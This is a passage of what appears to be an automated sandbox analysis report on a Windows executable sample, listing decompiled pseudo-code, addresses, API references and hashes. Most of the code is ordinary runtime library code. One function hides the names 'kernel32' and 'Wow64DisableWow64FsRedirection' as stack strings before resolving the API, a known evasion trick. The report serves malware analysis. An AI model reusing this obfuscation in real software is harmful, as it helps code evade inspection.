																						_v88 = "bad cast";
																						E00416C8D( &_v92, 0x446bf8);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t199);
																						_t201 = _t162;
																						_t105 = E0041500C(_t180, __eflags, 0x24);
																						__eflags = _t105;
																						if(_t105 == 0) {
																							_t105 = 0;
																							__eflags = 0;
																						} else {
																							 *((intOrPtr*)(_t105 + 4)) = 0x14;
																							 *((intOrPtr*)(_t105 + 8)) = 0;
																							 *((intOrPtr*)(_t105 + 0xc)) = 0;
																							 *((intOrPtr*)(_t105 + 0x10)) = 0;
																							 *_t105 = 0x437540;
																							 *((intOrPtr*)(_t105 + 0x18)) = 0;
																							 *((intOrPtr*)(_t105 + 0x1c)) = 0;
																							 *((intOrPtr*)(_t105 + 0x20)) = 0;
																						}
																						_t164 = _v112;
																						 *_t201 = _t105;
																						_t201[1] = _t105;
																						_t201[3] = _v116;
																						_t201[2] = _t164;
																						_t201[4] =  !(_t164 >> 3) & 0x00000100;
																						_t167 =  !(_t164 >> 9) & 0x00000004;
																						__eflags = _t167;
																						_t201[5] = _t167;
																						return _t201;
																					} else {
																						_t199 = _v104;
																						 *0x44c818 = _t199;
																						 *((intOrPtr*)( *_t199 + 4))();
																						E00413D84(__eflags, _t199);
																						_t226 = _t228 + 4;
																						goto L52;
																					}
																				} else {
																					E004133F5( &_v96);
																					return _t150;
																				}
																			} else {
																				_t199 =  *( *((intOrPtr*)(_t116 + 8)) + _t189 * 4);
																				goto L47;
																			}
																		}
																	}
																}
															} else {
																_t197 = _v64;
																 *0x44c814 = _t197;
																 *((intOrPtr*)( *_t197 + 4))();
																E00413D84(__eflags, _t197);
																_t223 = _t225 + 4;
																goto L34;
															}
														} else {
															E004133F5( &_v56);
															return _t148;
														}
													} else {
														_t197 =  *( *((intOrPtr*)(_t127 + 8)) + _t187 * 4);
														goto L29;
													}
												}
											}
										}
									} else {
										_t195 = _v24;
										 *0x44c800 = _t195;
										 *((intOrPtr*)( *_t195 + 4))();
										E00413D84(__eflags, _t195);
										_t220 = _t222 + 4;
										goto L16;
									}
								} else {
									E004133F5( &_v16);
									return _t146;
								}
							} else {
								_t195 =  *((intOrPtr*)( *((intOrPtr*)(_t138 + 8)) + _t185 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00403a70
0x00403a70
0x00403a7d
0x00403a82
0x00403a88
0x00403a8e
0x00403a94
0x00403a9b
0x00403aa0
0x00403aa6
0x00403aa8
0x00403aad
0x00403aae
0x00403ab3
0x00403ab3
0x00403abc
0x00403ac1
0x00403ac1
0x00403ac7
0x00403acb
0x00403ad1
0x00403adf
0x00403adf
0x00000000
0x00403ad3
0x00403ad6
0x00403adb
0x00403b41
0x00403b45
0x00403b53
0x00403add
0x00403ae1
0x00403ae5
0x00403af7
0x00403af9
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ae7
0x00403ae7
0x00403aef
0x00403afb
0x00403afd
0x00403b1a
0x00403b1f
0x00403b22
0x00403b25
0x00403b54
0x00403b57
0x00403b68
0x00403b6f
0x00403b77
0x00403b7c
0x00403b7d
0x00403b7e
0x00403b7f
0x00403b80
0x00403b83
0x00403b84
0x00403b85
0x00403b86
0x00403b8d
0x00403b92
0x00403b98
0x00403b9e
0x00403ba2
0x00403ba4
0x00403bab
0x00403bb0
0x00403bb6
0x00403bb8
0x00403bbd
0x00403bbd
0x00403bbe
0x00403bc3
0x00403bc3
0x00403bcc
0x00403bd1
0x00403bd1
0x00403bd7
0x00403bdb
0x00403bde
0x00403be1
0x00403bef
0x00403bef
0x00000000
0x00403be3
0x00403be6
0x00403be9
0x00403beb
0x00403c51
0x00403c55
0x00403c63
0x00403bed
0x00403bf1
0x00403bf1
0x00403bf5
0x00403c07
0x00403c07
0x00403c09
0x00000000
0x00000000
0x00000000
0x00000000
0x00403bf7
0x00403bf7
0x00403bfc
0x00403bff
0x00403c0b
0x00403c0b
0x00403c0d
0x00403c2a
0x00403c2f
0x00403c32
0x00403c35
0x00403c64
0x00403c67
0x00403c78
0x00403c7f
0x00403c87
0x00403c8c
0x00403c8d
0x00403c8e
0x00403c8f
0x00403c90
0x00403c93
0x00403c94
0x00403c95
0x00403c96
0x00403c9d
0x00403ca2
0x00403ca8
0x00403cae
0x00403cb2
0x00403cb4
0x00403cbb
0x00403cc0
0x00403cc6
0x00403cc8
0x00403ccd
0x00403ccd
0x00403cce
0x00403cd3
0x00403cd3
0x00403cdc
0x00403ce1
0x00403ce1
0x00403ce7
0x00403ceb
0x00403cee
0x00403cf1
0x00403cff
0x00403cff
0x00000000
0x00403cf3
0x00403cf6
0x00403cf9
0x00403cfb
0x00403d61
0x00403d65
0x00403d73
0x00403cfd
0x00403d01
0x00403d01
0x00403d05
0x00403d17
0x00403d17
0x00403d19
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d07
0x00403d07
0x00403d0c
0x00403d0f
0x00403d1b
0x00403d1b
0x00403d1d
0x00403d3a
0x00403d3f
0x00403d42
0x00403d45
0x00403d74
0x00403d77
0x00403d88
0x00403d8f
0x00403d97
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dad
0x00403daf
0x00403dea
0x00403dea
0x00403db1
0x00403db1
0x00403db8
0x00403dbf
0x00403dc6
0x00403dcd
0x00403dd3
0x00403dda
0x00403de1
0x00403de1
0x00403dec
0x00403df0
0x00403df2
0x00403df9
0x00403dfe
0x00403e10
0x00403e13
0x00403e13
0x00403e16
0x00403e1c
0x00403d47
0x00403d47
0x00403d4d
0x00403d55
0x00403d59
0x00403d5e
0x00000000
0x00403d5e
0x00403d1f
0x00403d25
0x00403d33
0x00403d33
0x00403d11
0x00403d14
0x00000000
0x00403d14
0x00403d0f
0x00403d05
0x00403cfb
0x00403c37
0x00403c37
0x00403c3d
0x00403c45
0x00403c49
0x00403c4e
0x00000000
0x00403c4e
0x00403c0f
0x00403c15
0x00403c23
0x00403c23
0x00403c01
0x00403c04
0x00000000
0x00403c04
0x00403bff
0x00403bf5
0x00403beb
0x00403b27
0x00403b27
0x00403b2d
0x00403b35
0x00403b39
0x00403b3e
0x00000000
0x00403b3e
0x00403aff
0x00403b05
0x00403b13
0x00403b13
0x00403af1
0x00403af4
0x00000000
0x00403af4
0x00403aef
0x00403ae5
0x00403adb

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00403A7D
std::_Lockit::_Lockit.LIBCPMT ref: 00403A9B
std::_Lockit::~_Lockit.LIBCPMT ref: 00403ABC
std::_Lockit::~_Lockit.LIBCPMT ref: 00403B05

Part of subcall function 004099F0: new.LIBCMT ref: 00409A0A
Part of subcall function 004099F0: __Getctype.LIBCPMT ref: 00409A4C

std::_Facet_Register.LIBCPMT ref: 00403B39

Part of subcall function 00413D84: new.LIBCMT ref: 00413D8A

std::_Lockit::~_Lockit.LIBCPMT ref: 00403B45
__CxxThrowException@8.LIBVCRUNTIME ref: 00403B77

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Strings

), xrefs: 00403A88, 00403B2D

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$DispatcherExceptionException@8Facet_GetctypeRegisterThrowUser
String ID: )
API String ID: 2281935022-321745597
Opcode ID: d8c54d312d6656bf882e909e0be23d33e4a9ad7a44da36bb3b1f48975b29a883
Instruction ID: 46eaf09e67727605e48d9e1dfb78430163addbf04b0a2ee73662710f53d87094
Opcode Fuzzy Hash: d8c54d312d6656bf882e909e0be23d33e4a9ad7a44da36bb3b1f48975b29a883
Instruction Fuzzy Hash: D5312935A003008BC710EF08D88145AB7A8EF95329F14057FF89563392DB38BE85CF9A

Uniqueness

Uniqueness Score: 100.00%

Function 0041071A, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 60
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 58%

			E0041071A(char _a4) {
				char _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v27;
				char _v28;
				intOrPtr _v32;
				char _v33;
				intOrPtr _v37;
				intOrPtr _v41;
				intOrPtr _v45;
				char _v46;
				short _v48;
				intOrPtr _v52;
				char _v56;
				short _t25;
				short _t26;
				short _t27;
				short _t28;
				_Unknown_base(*)()* _t30;
				char _t36;
				char _t38;
				char _t40;

				_t25 = 0x6b;
				_v24 = _t25;
				_t26 = 0x65;
				_t40 = 0x72;
				_t36 = 0x6e;
				_t38 = 0x6c;
				_v22 = _t26;
				_v16 = _t26;
				_t27 = 0x33;
				_v12 = _t27;
				_t28 = 0x32;
				_v10 = _t28;
				_v8 = 0;
				_v26 = 0;
				_t30 =  *0x41991c; // 0x0
				_v18 = _t36;
				_v27 = _t36;
				_v20 = _t40;
				_v14 = _t38;
				_v56 = 0x36776f57;
				_v52 = 0x73694434;
				_v48 = 0x6261;
				_v46 = _t38;
				_v45 = 0x776f5765;
				_v41 = 0x73463436;
				_v37 = 0x69646552;
				_v33 = _t40;
				_v32 = 0x69746365;
				_v28 = 0x6f;
				if(_t30 != 0) {
					L2:
					return  *_t30( &_a4);
				}
				_t22 =  &_v56; // 0x36776f57
				_t30 = GetProcAddress(GetModuleHandleW( &_v24), _t22);
				 *0x41991c = _t30;
				if(_t30 != 0) {
					goto L2;
				}
				return _t30;
			}

0x00410723
0x00410726
0x0041072a
0x0041072d
0x00410730
0x00410733
0x00410736
0x0041073a
0x0041073e
0x0041073f
0x00410745
0x00410746
0x0041074c
0x0041074f
0x00410752
0x00410757
0x0041075b
0x0041075e
0x00410762
0x00410766
0x0041076d
0x00410774
0x0041077a
0x0041077d
0x00410784
0x0041078b
0x00410792
0x00410795
0x0041079c
0x004107a3
0x004107c3
0x00000000
0x004107c7
0x004107a5
0x004107b4
0x004107ba
0x004107c1
0x00000000
0x00000000
0x004107cc

APIs

GetModuleHandleW.KERNEL32(?,Wow64Disab), ref: 004107AD
GetProcAddress.KERNEL32(00000000), ref: 004107B4

Strings

eWow, xrefs: 0041077D
Wow64Disab, xrefs: 004107A5, 004107A8
64Fs, xrefs: 00410784
o, xrefs: 0041079C
Redi, xrefs: 0041078B
ecti, xrefs: 00410795

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: 64Fs$Redi$Wow64Disab$eWow$ecti$o
API String ID: 1646373207-1520721706
Opcode ID: 2066833c54953dec7175eead0527d8421ba9244bbc279ae471456f5edd53b13d
Instruction ID: 92dd8dd2336ba326b3c7a2805d180385c03c51a1d731b0e7f80992f0327613cc
Opcode Fuzzy Hash: 2066833c54953dec7175eead0527d8421ba9244bbc279ae471456f5edd53b13d
Instruction Fuzzy Hash: 16219D71D05389AADB10CFE4E951BEEBB74AF18B00F10806AE504EB291E7714B44CB69

Uniqueness

Uniqueness Score: 100.00%

Function 00430C0E, Relevance: 13.8, APIs: 9, Instructions: 302
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00430C0E(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				_t246 = _t198 - 0xfffffffe;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(__eflags < 0) {
						L59:
						_t137 = E0041A8DC(__eflags);
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E0041A8EF( *_t137))) = 9;
						L60:
						_t139 = E0041A815();
						goto L61;
					}
					__eflags = _t198 -  *0x44e178; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0x44df78 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if(__eflags == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(__eflags <= 0) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(__eflags == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags == 0) {
								L14:
								 *(E0041A8DC(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E0041A8EF(__eflags))) = 0x16;
								E0041A815();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E0042151C(_t154);
								E004214E2(0);
								E004214E2(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E004280D4(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x44df78 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x44df78 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x44df78 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x44df78 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x44df78 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x44df78 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x44df78 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00430417(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E0041A8B9(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E0041A8EF(__eflags))) = 9;
											 *(E0041A8DC(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x44df78 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00430769();
												} else {
													_t170 = E00430A89();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00430930(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x44df78 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E0041A8EF(__eflags))) = 0xc;
									 *(E0041A8DC(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E004214E2(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x44df78 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E0041A8DC(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E0041A8EF(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E0041A8DC(_t246)) =  *_t197 & 0x00000000;
					_t139 = E0041A8EF(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x00430c17
0x00430c1b
0x00430c1e
0x00430c38
0x00430c3a
0x00430f9f
0x00430f9f
0x00430fa4
0x00430fa4
0x00430fac
0x00430fb2
0x00430fb2
0x00000000
0x00430fb2
0x00430c40
0x00430c46
0x00000000
0x00000000
0x00430c50
0x00430c56
0x00430c59
0x00430c5c
0x00430c66
0x00430c69
0x00430c6c
0x00430c70
0x00430c72
0x00000000
0x00000000
0x00430c78
0x00430c7b
0x00430c81
0x00430c9b
0x00430c9d
0x00430f9b
0x00000000
0x00430f9b
0x00430ca3
0x00430ca6
0x00000000
0x00000000
0x00430cac
0x00430cb0
0x00000000
0x00000000
0x00430cb6
0x00430cb9
0x00430cbd
0x00430cc4
0x00430cc6
0x00430cc6
0x00430cc9
0x00430d1e
0x00430d20
0x00430ce6
0x00430ceb
0x00430cf2
0x00430cf8
0x00000000
0x00430d22
0x00430d24
0x00430d25
0x00430d27
0x00430d2a
0x00430d2c
0x00430d2e
0x00430d30
0x00430d30
0x00430d3b
0x00430d3d
0x00430d44
0x00430d49
0x00430d4c
0x00430d4f
0x00430d51
0x00430d75
0x00430d7d
0x00430d80
0x00430d87
0x00430d8e
0x00430d92
0x00430d94
0x00430d97
0x00430d9e
0x00430d9e
0x00430da1
0x00430da3
0x00430da6
0x00430dab
0x00430dae
0x00430db7
0x00430dbb
0x00430dbe
0x00430dc0
0x00430dc6
0x00430dc8
0x00430dd1
0x00430dd2
0x00430dd4
0x00430dd8
0x00430dd9
0x00430ddd
0x00430de0
0x00430dea
0x00430def
0x00430df2
0x00430e01
0x00430e05
0x00430e08
0x00430e0a
0x00430e0c
0x00430e0e
0x00430e13
0x00430e15
0x00430e19
0x00430e1a
0x00430e20
0x00430e2a
0x00430e2b
0x00430e2e
0x00430e33
0x00430e36
0x00430e45
0x00430e49
0x00430e4c
0x00430e4e
0x00430e50
0x00430e52
0x00430e54
0x00430e5a
0x00430e5a
0x00430e5b
0x00430e6a
0x00430e6d
0x00430e6e
0x00430e6e
0x00430e52
0x00430e4e
0x00430e36
0x00430e0e
0x00430e0a
0x00430df2
0x00430dc8
0x00430dc0
0x00430e74
0x00430e7a
0x00430e7c
0x00430eef
0x00430eef
0x00430ef3
0x00430f03
0x00430f09
0x00430f0b
0x00430f67
0x00430f67
0x00430f6f
0x00430f70
0x00430f72
0x00430f8b
0x00430f8e
0x00430ecb
0x00430ecc
0x00000000
0x00430ed1
0x00430f94
0x00000000
0x00430f94
0x00430f79
0x00430f84
0x00000000
0x00430f84
0x00430f0d
0x00430f10
0x00430f13
0x00000000
0x00000000
0x00430f15
0x00430f15
0x00430f18
0x00430f1b
0x00430f1e
0x00430f25
0x00430f2a
0x00430f2c
0x00430f30
0x00430f4b
0x00430f4f
0x00430f50
0x00430f53
0x00430f54
0x00430f60
0x00430f56
0x00430f56
0x00430f56
0x00430f32
0x00430f32
0x00430f32
0x00430f3d
0x00430f42
0x00430f45
0x00430f45
0x00000000
0x00430f2a
0x00430e81
0x00430e84
0x00430e8b
0x00430e90
0x00000000
0x00000000
0x00430e99
0x00430e9f
0x00430ea1
0x00000000
0x00000000
0x00430ea3
0x00430ea7
0x00000000
0x00000000
0x00430ebb
0x00430ec1
0x00430ec3
0x00430ee7
0x00430eea
0x00000000
0x00430eea
0x00430ec5
0x00000000
0x00430d53
0x00430d58
0x00430d63
0x00430ed2
0x00430ed2
0x00430ed2
0x00430ed5
0x00430ed6
0x00000000
0x00430ede
0x00430d51
0x00430d20
0x00430ccb
0x00430cce
0x00430ce2
0x00430ce4
0x00430d05
0x00430d08
0x00430d0b
0x00430d0e
0x00000000
0x00430d0e
0x00000000
0x00430cd0
0x00430cd0
0x00430cd3
0x00430cd6
0x00000000
0x00430cd6
0x00430cce
0x00430c83
0x00430c88
0x00430c90
0x00000000
0x00430c20
0x00430c25
0x00430c28
0x00430c2d
0x00430fb7
0x00000000
0x00430fb7

APIs

Part of subcall function 0042151C: RtlAllocateHeap.NTDLL(00000000,0041370C,?,?,00416C35,?,?,1FFFFFFF,00000008,?,00413478,0041370C,?,?,?,?), ref: 0042154E

_free.LIBCMT ref: 00430D3D
_free.LIBCMT ref: 00430D44
GetConsoleMode.KERNEL32(?,00000000), ref: 00430E99
ReadConsoleW.KERNEL32(?,?,00000000,?,00000000), ref: 00430EBB
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00430EC5
__dosmaperr.LIBCMT ref: 00430ECC
_free.LIBCMT ref: 00430ED6

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00430F03

Part of subcall function 00430769: ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00430843

Part of subcall function 00430930: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,7FFFFFFF), ref: 00430A4D
Part of subcall function 00430930: __dosmaperr.LIBCMT ref: 00430A54

GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00430F67

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast$Read_free$ConsoleFileHeap__dosmaperr$AllocateFreeMode
String ID:
API String ID: 3847249420-0
Opcode ID: ea22a2af86d6ccacdf32f6a886a7951a06f80454c9f293dc3a9bf86792e5e88c
Instruction ID: a1dfd01de9d7cfac9b6dd516b5f11afb24217e0221ba4ae7d62c87e1456730b8
Opcode Fuzzy Hash: ea22a2af86d6ccacdf32f6a886a7951a06f80454c9f293dc3a9bf86792e5e88c
Instruction Fuzzy Hash: 06C10770E04209AFDB25DFA9C8A1BAE7BB0AF4D304F14525AF40597392C7789D42CB6D

Uniqueness

Uniqueness Score: 3.75%

Function 0042E045, Relevance: 13.7, APIs: 9, Instructions: 201
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0042E045(void* __edx, char _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t59;
				signed int _t68;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				char _t81;
				intOrPtr* _t82;
				void* _t93;
				signed int _t96;
				char _t107;
				char _t108;
				void* _t113;
				char* _t114;
				signed int _t120;
				signed int* _t121;
				char _t123;
				intOrPtr* _t125;
				char* _t130;

				_t113 = __edx;
				_t123 = _a4;
				_v24 = _t123;
				_v20 = 0;
				if( *((intOrPtr*)(_t123 + 0xb0)) != 0 ||  *((intOrPtr*)(_t123 + 0xac)) != 0) {
					_v16 = 1;
					_t93 = E00420EFE(1, 0x50);
					if(_t93 != 0) {
						_t96 = 0x14;
						memcpy(_t93,  *(_t123 + 0x88), _t96 << 2);
						_t125 = E0042151C(4);
						_t120 = 0;
						_v8 = _t125;
						E004214E2(0);
						if(_t125 != 0) {
							 *_t125 = 0;
							_t123 = _a4;
							if( *((intOrPtr*)(_t123 + 0xb0)) == 0) {
								_t52 =  *0x44b7b8; // 0x44b80c
								 *_t93 = _t52;
								_t53 =  *0x44b7bc; // 0x44dbd8
								 *((intOrPtr*)(_t93 + 4)) = _t53;
								_t54 =  *0x44b7c0; // 0x44dbd8
								 *((intOrPtr*)(_t93 + 8)) = _t54;
								_t55 =  *0x44b7e8; // 0x44b810
								 *((intOrPtr*)(_t93 + 0x30)) = _t55;
								_t56 =  *0x44b7ec; // 0x44dbdc
								 *((intOrPtr*)(_t93 + 0x34)) = _t56;
								L19:
								 *_v8 = 1;
								if(_t120 != 0) {
									 *_t120 = 1;
								}
								goto L21;
							}
							_t121 = E0042151C(4);
							_v12 = _t121;
							E004214E2(0);
							_push(_t93);
							if(_t121 != 0) {
								 *_t121 =  *_t121 & 0x00000000;
								_t122 =  *((intOrPtr*)(_t123 + 0xb0));
								_t68 = E00429F96(_t113);
								_t16 = _t93 + 4; // 0x4
								_t70 = E00429F96(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0xf, _t16,  &_v24);
								_t18 = _t93 + 8; // 0x8
								_t73 = E00429F96(_t113,  &_v24, 1,  *((intOrPtr*)(_t123 + 0xb0)), 0x10, _t18, 1);
								_t76 = E00429F96(_t113,  &_v24, 2,  *((intOrPtr*)(_t123 + 0xb0)), 0xe, _t93 + 0x30, _t122);
								_t22 = _t93 + 0x34; // 0x34
								if((E00429F96(_t113,  &_v24, 2, _t122, 0xf, _t22, 0xe) | _t68 | _t70 | _t73 | _t76) == 0) {
									_t114 =  *((intOrPtr*)(_t93 + 8));
									while(1) {
										_t81 =  *_t114;
										if(_t81 == 0) {
											break;
										}
										_t30 = _t81 - 0x30; // -48
										_t107 = _t30;
										if(_t107 > 9) {
											if(_t81 != 0x3b) {
